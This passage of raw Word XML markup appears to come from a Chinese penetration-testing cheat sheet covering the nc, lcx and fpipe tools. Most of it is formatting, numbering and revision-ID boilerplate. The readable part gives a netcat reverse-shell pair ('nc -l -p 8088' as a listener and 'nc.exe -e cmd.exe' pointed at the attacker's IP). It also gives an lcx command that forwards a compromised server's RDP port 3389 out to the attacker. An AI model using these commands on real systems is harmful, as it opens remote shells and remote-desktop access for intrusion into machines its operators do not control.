        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc468296500"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口监听</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00A57B0C" w:rsidRDefault="00A57B0C" w:rsidP="00080F2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmdshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4F73" w:rsidRDefault="00255F97" w:rsidP="00080F2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vv </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">p 8088  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8088</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00255F97" w:rsidRDefault="0095192A" w:rsidP="00080F2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nc.exe </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">e cmd.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP 8088</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF18B2" w:rsidRDefault="00CF18B2" w:rsidP="00FA1B7D">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E57E3F" w:rsidRDefault="00E57E3F" w:rsidP="008511FF">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc468296501"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lcx</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口转发</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00EB4F73" w:rsidRDefault="00143C8B" w:rsidP="00080F2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lcx.exe </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">listen 52 1818  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口转发到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1818</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00143C8B" w:rsidRDefault="00143C8B" w:rsidP="00080F2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lcx.exe </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">slave </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP 52 127.0.0.1 3389  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转发到你电脑的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E68CB" w:rsidRDefault="002E68CB" w:rsidP="00FA1B7D">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E57E3F" w:rsidRDefault="00E57E3F" w:rsidP="008511FF">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc468296502"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fpipe</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口重定向</w:t>
      </w:r>
      <w:r w:rsidR="008B21FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00EB4F73" w:rsidRDefault="00EB4F73" w:rsidP="00080F2F"/>
    <w:p w:rsidR="00EB4F73" w:rsidRPr="0061095D" w:rsidRDefault="00EB4F73" w:rsidP="00080F2F"/>
    <w:sectPr w:rsidR="00EB4F73" w:rsidRPr="0061095D" w:rsidSect="003567B9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E82" w:rsidRDefault="003B5E82" w:rsidP="0016263B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="003B5E82" w:rsidRDefault="003B5E82" w:rsidP="00162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6032"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="00635817" w:rsidRDefault="000A2044">
        <w:pPr>
          <w:pStyle w:val="a4"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="001D35A4" w:rsidRPr="001D35A4">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:fldSimple>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00635817" w:rsidRDefault="0063581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17" w:rsidRDefault="000A2044">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
      <w:r w:rsidR="000B6553" w:rsidRPr="000B6553">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:fldSimple>
  </w:p>
  <w:p w:rsidR="00635817" w:rsidRDefault="006358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E82" w:rsidRDefault="003B5E82" w:rsidP="0016263B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="003B5E82" w:rsidRDefault="003B5E82" w:rsidP="00162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2DD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30326B68"/>
    <w:lvl w:ilvl="0" w:tplc="3D789D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075BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8466A576"/>
    <w:lvl w:ilvl="0" w:tplc="61C43C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7B5C81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BE84BC8"/>
    <w:lvl w:ilvl="0" w:tplc="114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493ACD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="435EDC0E"/>
    <w:lvl w:ilvl="0" w:tplc="55CCE9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3D5AC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1EEBA7A"/>
    <w:lvl w:ilvl="0" w:tplc="2D08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781459"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A4CE922"/>
    <w:lvl w:ilvl="0" w:tplc="509006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102314"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="709EE56A"/>
    <w:lvl w:ilvl="0" w:tplc="4548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746ACB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EF24272"/>
    <w:lvl w:ilvl="0" w:tplc="5BD0A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3F1227"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA16CD2A"/>
    <w:lvl w:ilvl="0" w:tplc="F8F0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446C68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AE2F948"/>
    <w:lvl w:ilvl="0" w:tplc="A96C3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9127BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D1E9BBA"/>
    <w:lvl w:ilvl="0" w:tplc="4AF05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DC7A7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAFCE20A"/>
    <w:lvl w:ilvl="0" w:tplc="F8F0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3A3E51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC42D160"/>
    <w:lvl w:ilvl="0" w:tplc="F8F0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F976C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59CA2474"/>
    <w:lvl w:ilvl="0" w:tplc="281C0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D651D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="835856B2"/>
    <w:lvl w:ilvl="0" w:tplc="12A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8640F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A604977C"/>
    <w:lvl w:ilvl="0" w:tplc="A33824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8B2FAB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59126B0A"/>
    <w:lvl w:ilvl="0" w:tplc="77EAB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6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63B"/>
    <w:rsid w:val="000002BE"/>
    <w:rsid w:val="00003EA7"/>
    <w:rsid w:val="00006599"/>
    <w:rsid w:val="00007C9F"/>
    <w:rsid w:val="000107FB"/>
    <w:rsid w:val="00010A97"/>
    <w:rsid w:val="00012F0C"/>
    <w:rsid w:val="0001458C"/>
    <w:rsid w:val="00025A8E"/>
    <w:rsid w:val="00025C3E"/>
    <w:rsid w:val="00030D76"/>
    <w:rsid w:val="0003614F"/>
    <w:rsid w:val="0003627E"/>
    <w:rsid w:val="00037418"/>
    <w:rsid w:val="00043A0B"/>
    <w:rsid w:val="00052779"/>
    <w:rsid w:val="00053B40"/>
    <w:rsid w:val="000541CA"/>
    <w:rsid w:val="00054B8D"/>
    <w:rsid w:val="00056B05"/>
    <w:rsid w:val="000573C4"/>
    <w:rsid w:val="000610C9"/>
    <w:rsid w:val="00062861"/>
    <w:rsid w:val="000646C4"/>
    <w:rsid w:val="00072854"/>
    <w:rsid w:val="0007421B"/>
    <w:rsid w:val="000743DF"/>
    <w:rsid w:val="000769BB"/>
    <w:rsid w:val="00080F2F"/>
    <w:rsid w:val="0008286F"/>
    <w:rsid w:val="00084F21"/>
    <w:rsid w:val="0008506E"/>
    <w:rsid w:val="00085548"/>
    <w:rsid w:val="0009655A"/>
    <w:rsid w:val="000A2044"/>
    <w:rsid w:val="000A3960"/>
    <w:rsid w:val="000A3B73"/>
    <w:rsid w:val="000A792E"/>
    <w:rsid w:val="000B007B"/>
    <w:rsid w:val="000B4C1D"/>
    <w:rsid w:val="000B6553"/>
    <w:rsid w:val="000B7FB1"/>
    <w:rsid w:val="000C2A99"/>
    <w:rsid w:val="000C364A"/>
    <w:rsid w:val="000D0EAF"/>
    <w:rsid w:val="000D3AFB"/>
    <w:rsid w:val="000D54E0"/>
    <w:rsid w:val="000D5D1F"/>
    <w:rsid w:val="000E30FD"/>
    <w:rsid w:val="000E7269"/>
    <w:rsid w:val="000F0393"/>
    <w:rsid w:val="000F1BBF"/>
    <w:rsid w:val="001006F1"/>
    <w:rsid w:val="0010761B"/>
    <w:rsid w:val="00110DB3"/>
    <w:rsid w:val="0011170D"/>
    <w:rsid w:val="001137D7"/>
    <w:rsid w:val="00114FB6"/>
    <w:rsid w:val="00116B24"/>
    <w:rsid w:val="00116D29"/>
    <w:rsid w:val="00120165"/>
    <w:rsid w:val="00124629"/>
    <w:rsid w:val="00125B19"/>
    <w:rsid w:val="00125B50"/>
    <w:rsid w:val="0013319F"/>
    <w:rsid w:val="0013466E"/>
    <w:rsid w:val="001364EE"/>
    <w:rsid w:val="00140719"/>
    <w:rsid w:val="00140D94"/>
    <w:rsid w:val="00143C8B"/>
    <w:rsid w:val="00144A1F"/>
    <w:rsid w:val="00145BF4"/>
    <w:rsid w:val="00147058"/>
    <w:rsid w:val="00150939"/>
    <w:rsid w:val="001548E7"/>
    <w:rsid w:val="00161D87"/>
    <w:rsid w:val="0016263B"/>
    <w:rsid w:val="00163279"/>
    <w:rsid w:val="001675FF"/>
    <w:rsid w:val="00175AAB"/>
    <w:rsid w:val="001828BC"/>
    <w:rsid w:val="00182CC5"/>
    <w:rsid w:val="001841D0"/>
    <w:rsid w:val="001858A1"/>
    <w:rsid w:val="00185A8B"/>
    <w:rsid w:val="0018715B"/>
    <w:rsid w:val="0018751F"/>
    <w:rsid w:val="001944EF"/>
    <w:rsid w:val="00195D3D"/>
    <w:rsid w:val="00197821"/>
    <w:rsid w:val="001A0269"/>
    <w:rsid w:val="001A24AA"/>
    <w:rsid w:val="001A451C"/>
    <w:rsid w:val="001A642C"/>
    <w:rsid w:val="001B1343"/>
    <w:rsid w:val="001B5A18"/>
    <w:rsid w:val="001C1EEA"/>
    <w:rsid w:val="001C5619"/>
    <w:rsid w:val="001C5F0C"/>
    <w:rsid w:val="001C694C"/>
    <w:rsid w:val="001D0374"/>
    <w:rsid w:val="001D11FC"/>
    <w:rsid w:val="001D35A4"/>
    <w:rsid w:val="001D3E4A"/>
    <w:rsid w:val="001D3FA7"/>
    <w:rsid w:val="001D5DA5"/>
    <w:rsid w:val="001E07EB"/>
    <w:rsid w:val="001E504E"/>
    <w:rsid w:val="001F0244"/>
    <w:rsid w:val="001F5224"/>
    <w:rsid w:val="00206EBF"/>
    <w:rsid w:val="00211D84"/>
    <w:rsid w:val="00217B4F"/>
    <w:rsid w:val="00217DE1"/>
    <w:rsid w:val="00222294"/>
    <w:rsid w:val="002227C6"/>
    <w:rsid w:val="00232FAB"/>
    <w:rsid w:val="00233090"/>
    <w:rsid w:val="0023663F"/>
    <w:rsid w:val="00236BDF"/>
    <w:rsid w:val="002403A9"/>
    <w:rsid w:val="00251095"/>
    <w:rsid w:val="00251B58"/>
    <w:rsid w:val="00252DE7"/>
    <w:rsid w:val="0025377D"/>
    <w:rsid w:val="00254CD2"/>
    <w:rsid w:val="00255F97"/>
    <w:rsid w:val="0026006F"/>
    <w:rsid w:val="002640ED"/>
    <w:rsid w:val="002648B6"/>
    <w:rsid w:val="00272771"/>
    <w:rsid w:val="00272A2C"/>
    <w:rsid w:val="00277FF9"/>
    <w:rsid w:val="00281293"/>
    <w:rsid w:val="00281AE3"/>
    <w:rsid w:val="00282C79"/>
    <w:rsid w:val="0028601B"/>
    <w:rsid w:val="002876A6"/>
    <w:rsid w:val="00287F83"/>
    <w:rsid w:val="00290769"/>
    <w:rsid w:val="0029155B"/>
    <w:rsid w:val="00296953"/>
    <w:rsid w:val="00297487"/>
    <w:rsid w:val="002A00F7"/>
    <w:rsid w:val="002A0161"/>
    <w:rsid w:val="002A6938"/>
    <w:rsid w:val="002A7ED5"/>
    <w:rsid w:val="002B1F7D"/>
    <w:rsid w:val="002B29CB"/>
    <w:rsid w:val="002B3D04"/>
    <w:rsid w:val="002B3F28"/>
    <w:rsid w:val="002B5CA4"/>
    <w:rsid w:val="002B78C9"/>
    <w:rsid w:val="002C0CBC"/>
    <w:rsid w:val="002C132B"/>
    <w:rsid w:val="002C58A7"/>
    <w:rsid w:val="002C789D"/>
    <w:rsid w:val="002C7E09"/>
    <w:rsid w:val="002D33F6"/>
    <w:rsid w:val="002D558A"/>
    <w:rsid w:val="002D5F8A"/>
    <w:rsid w:val="002E2CCD"/>
    <w:rsid w:val="002E42DC"/>
    <w:rsid w:val="002E5018"/>
    <w:rsid w:val="002E68CB"/>
    <w:rsid w:val="002E6CE1"/>
    <w:rsid w:val="002E7EAF"/>
    <w:rsid w:val="002F1B41"/>
    <w:rsid w:val="002F37A3"/>
    <w:rsid w:val="002F4220"/>
    <w:rsid w:val="00300B49"/>
    <w:rsid w:val="003077ED"/>
    <w:rsid w:val="00313CC3"/>
    <w:rsid w:val="0031450B"/>
    <w:rsid w:val="003145FD"/>
    <w:rsid w:val="00314F05"/>
    <w:rsid w:val="0031547D"/>
    <w:rsid w:val="00316325"/>
    <w:rsid w:val="00316A97"/>
    <w:rsid w:val="003206AA"/>
    <w:rsid w:val="00322F7A"/>
    <w:rsid w:val="00324130"/>
    <w:rsid w:val="003337EC"/>
    <w:rsid w:val="00335007"/>
    <w:rsid w:val="00335AA9"/>
    <w:rsid w:val="00337E0A"/>
    <w:rsid w:val="0034081C"/>
    <w:rsid w:val="0034334F"/>
    <w:rsid w:val="003445D5"/>
    <w:rsid w:val="00347065"/>
    <w:rsid w:val="00355F8A"/>
    <w:rsid w:val="00356649"/>
    <w:rsid w:val="003567B9"/>
    <w:rsid w:val="00362FF1"/>
    <w:rsid w:val="00365660"/>
    <w:rsid w:val="00367243"/>
    <w:rsid w:val="00372B27"/>
    <w:rsid w:val="0037495D"/>
    <w:rsid w:val="003800BD"/>
    <w:rsid w:val="003819B4"/>
    <w:rsid w:val="00382383"/>
    <w:rsid w:val="00384053"/>
    <w:rsid w:val="0039608E"/>
    <w:rsid w:val="003967EC"/>
    <w:rsid w:val="00396A12"/>
    <w:rsid w:val="00397221"/>
    <w:rsid w:val="003A07C6"/>
    <w:rsid w:val="003A34F3"/>
    <w:rsid w:val="003A5C54"/>
    <w:rsid w:val="003A62DE"/>
    <w:rsid w:val="003A71DE"/>
    <w:rsid w:val="003A7442"/>
    <w:rsid w:val="003B5E82"/>
    <w:rsid w:val="003B6466"/>
    <w:rsid w:val="003B7A1B"/>
    <w:rsid w:val="003C29C1"/>
    <w:rsid w:val="003C6054"/>
    <w:rsid w:val="003C6573"/>
    <w:rsid w:val="003D2285"/>
    <w:rsid w:val="003D2FE1"/>
    <w:rsid w:val="003D364B"/>
    <w:rsid w:val="003E17CF"/>
    <w:rsid w:val="003E554A"/>
    <w:rsid w:val="003E74DE"/>
    <w:rsid w:val="003F041E"/>
    <w:rsid w:val="003F0B43"/>
    <w:rsid w:val="003F262E"/>
    <w:rsid w:val="003F31E3"/>
    <w:rsid w:val="003F4CC3"/>
    <w:rsid w:val="003F71C4"/>
    <w:rsid w:val="004011B1"/>
    <w:rsid w:val="00404734"/>
    <w:rsid w:val="00405470"/>
    <w:rsid w:val="004114DA"/>
    <w:rsid w:val="004127F8"/>
    <w:rsid w:val="00415CF0"/>
    <w:rsid w:val="004231DF"/>
    <w:rsid w:val="004239DF"/>
    <w:rsid w:val="00426D0C"/>
    <w:rsid w:val="004276F7"/>
    <w:rsid w:val="00427816"/>
    <w:rsid w:val="004311FA"/>
    <w:rsid w:val="00433508"/>
    <w:rsid w:val="004373E7"/>
    <w:rsid w:val="00437F7A"/>
    <w:rsid w:val="00441CF1"/>
    <w:rsid w:val="004431EE"/>
    <w:rsid w:val="00446840"/>
    <w:rsid w:val="00452D75"/>
    <w:rsid w:val="004617DC"/>
    <w:rsid w:val="00462E55"/>
    <w:rsid w:val="004644A2"/>
    <w:rsid w:val="004768C0"/>
    <w:rsid w:val="004774A3"/>
    <w:rsid w:val="004775D6"/>
    <w:rsid w:val="0048020D"/>
    <w:rsid w:val="004826FE"/>
    <w:rsid w:val="00486CBD"/>
    <w:rsid w:val="00493D98"/>
    <w:rsid w:val="00494980"/>
    <w:rsid w:val="00494E25"/>
    <w:rsid w:val="00496086"/>
    <w:rsid w:val="004A0363"/>
    <w:rsid w:val="004A0975"/>
    <w:rsid w:val="004A207F"/>
    <w:rsid w:val="004A216F"/>
    <w:rsid w:val="004B0C00"/>
    <w:rsid w:val="004B237D"/>
    <w:rsid w:val="004B58FC"/>
    <w:rsid w:val="004B73D3"/>
    <w:rsid w:val="004C06B2"/>
    <w:rsid w:val="004C6FAC"/>
    <w:rsid w:val="004C7BDE"/>
    <w:rsid w:val="004D004B"/>
    <w:rsid w:val="004D24C4"/>
    <w:rsid w:val="004D2684"/>
    <w:rsid w:val="004D2B0D"/>
    <w:rsid w:val="004D32B4"/>
    <w:rsid w:val="004D4124"/>
    <w:rsid w:val="004D4489"/>
    <w:rsid w:val="004D4C54"/>
    <w:rsid w:val="004E68BF"/>
    <w:rsid w:val="004F1C23"/>
    <w:rsid w:val="004F766A"/>
    <w:rsid w:val="00501098"/>
    <w:rsid w:val="00503D3D"/>
    <w:rsid w:val="00503DC3"/>
    <w:rsid w:val="0050456B"/>
    <w:rsid w:val="0051031A"/>
    <w:rsid w:val="005172C5"/>
    <w:rsid w:val="00520386"/>
    <w:rsid w:val="005258C8"/>
    <w:rsid w:val="00531D11"/>
    <w:rsid w:val="00536B97"/>
    <w:rsid w:val="00537EEC"/>
    <w:rsid w:val="00547846"/>
    <w:rsid w:val="0055559E"/>
    <w:rsid w:val="00561819"/>
    <w:rsid w:val="00563B1C"/>
    <w:rsid w:val="00570CE4"/>
    <w:rsid w:val="005720EC"/>
    <w:rsid w:val="0057299C"/>
    <w:rsid w:val="00576B02"/>
    <w:rsid w:val="00577D6A"/>
    <w:rsid w:val="0058141F"/>
    <w:rsid w:val="005826E7"/>
    <w:rsid w:val="00584A15"/>
    <w:rsid w:val="00590758"/>
    <w:rsid w:val="00594539"/>
    <w:rsid w:val="005966CC"/>
    <w:rsid w:val="00596D8E"/>
    <w:rsid w:val="00597F40"/>
    <w:rsid w:val="005A3848"/>
    <w:rsid w:val="005A65D8"/>
    <w:rsid w:val="005B10D1"/>
    <w:rsid w:val="005B2690"/>
    <w:rsid w:val="005B2773"/>
    <w:rsid w:val="005B328F"/>
    <w:rsid w:val="005B63B6"/>
    <w:rsid w:val="005C172D"/>
    <w:rsid w:val="005C5712"/>
    <w:rsid w:val="005C73A5"/>
    <w:rsid w:val="005D0D80"/>
    <w:rsid w:val="005D135A"/>
    <w:rsid w:val="005D2B96"/>
    <w:rsid w:val="005D3718"/>
    <w:rsid w:val="005D7DC7"/>
    <w:rsid w:val="005E0CF6"/>
    <w:rsid w:val="005E31C9"/>
    <w:rsid w:val="005E7917"/>
    <w:rsid w:val="005F237A"/>
    <w:rsid w:val="005F30EE"/>
    <w:rsid w:val="005F79E9"/>
    <w:rsid w:val="00600F4C"/>
    <w:rsid w:val="006030CC"/>
    <w:rsid w:val="006043C7"/>
    <w:rsid w:val="006106BB"/>
    <w:rsid w:val="0061095D"/>
    <w:rsid w:val="00611EFE"/>
    <w:rsid w:val="00620640"/>
    <w:rsid w:val="006206DC"/>
    <w:rsid w:val="006250EF"/>
    <w:rsid w:val="006270C5"/>
    <w:rsid w:val="00635817"/>
    <w:rsid w:val="00650BBD"/>
    <w:rsid w:val="006544E9"/>
    <w:rsid w:val="00656ACD"/>
    <w:rsid w:val="006605EA"/>
    <w:rsid w:val="00665A1A"/>
    <w:rsid w:val="0066674F"/>
    <w:rsid w:val="006750E2"/>
    <w:rsid w:val="0067646C"/>
    <w:rsid w:val="00677631"/>
    <w:rsid w:val="00682917"/>
    <w:rsid w:val="00683F63"/>
    <w:rsid w:val="00685793"/>
    <w:rsid w:val="006907A2"/>
    <w:rsid w:val="006924B2"/>
    <w:rsid w:val="00693AE2"/>
    <w:rsid w:val="00694558"/>
    <w:rsid w:val="00696638"/>
    <w:rsid w:val="00696F7A"/>
    <w:rsid w:val="006A313D"/>
    <w:rsid w:val="006B208C"/>
    <w:rsid w:val="006B4317"/>
    <w:rsid w:val="006C163F"/>
    <w:rsid w:val="006D0F73"/>
    <w:rsid w:val="006D16E6"/>
    <w:rsid w:val="006D4A18"/>
    <w:rsid w:val="006D7A1A"/>
    <w:rsid w:val="006E5201"/>
    <w:rsid w:val="006E521D"/>
    <w:rsid w:val="006E6950"/>
    <w:rsid w:val="006F1A53"/>
    <w:rsid w:val="006F4B66"/>
    <w:rsid w:val="006F52F2"/>
    <w:rsid w:val="006F5560"/>
    <w:rsid w:val="006F5B3C"/>
    <w:rsid w:val="007002D0"/>
    <w:rsid w:val="007006CB"/>
    <w:rsid w:val="00705C7E"/>
    <w:rsid w:val="00707308"/>
    <w:rsid w:val="00713961"/>
    <w:rsid w:val="00713C1C"/>
    <w:rsid w:val="00714426"/>
    <w:rsid w:val="00721334"/>
    <w:rsid w:val="007322CC"/>
    <w:rsid w:val="0073388B"/>
    <w:rsid w:val="00745630"/>
    <w:rsid w:val="00750309"/>
    <w:rsid w:val="00750C15"/>
    <w:rsid w:val="0075403E"/>
    <w:rsid w:val="00755291"/>
    <w:rsid w:val="00755DF8"/>
    <w:rsid w:val="00761994"/>
    <w:rsid w:val="00764A6E"/>
    <w:rsid w:val="00770978"/>
    <w:rsid w:val="00771013"/>
    <w:rsid w:val="007720DD"/>
    <w:rsid w:val="0077227B"/>
    <w:rsid w:val="0077480F"/>
    <w:rsid w:val="007749C1"/>
    <w:rsid w:val="00780622"/>
    <w:rsid w:val="00781CCA"/>
    <w:rsid w:val="00782178"/>
    <w:rsid w:val="00782964"/>
    <w:rsid w:val="00794273"/>
    <w:rsid w:val="00795F9F"/>
    <w:rsid w:val="00795FFD"/>
    <w:rsid w:val="007975E6"/>
    <w:rsid w:val="007A0185"/>
    <w:rsid w:val="007A2886"/>
    <w:rsid w:val="007B05C8"/>
    <w:rsid w:val="007B23D0"/>
    <w:rsid w:val="007B6EA6"/>
    <w:rsid w:val="007B7A0B"/>
    <w:rsid w:val="007C4413"/>
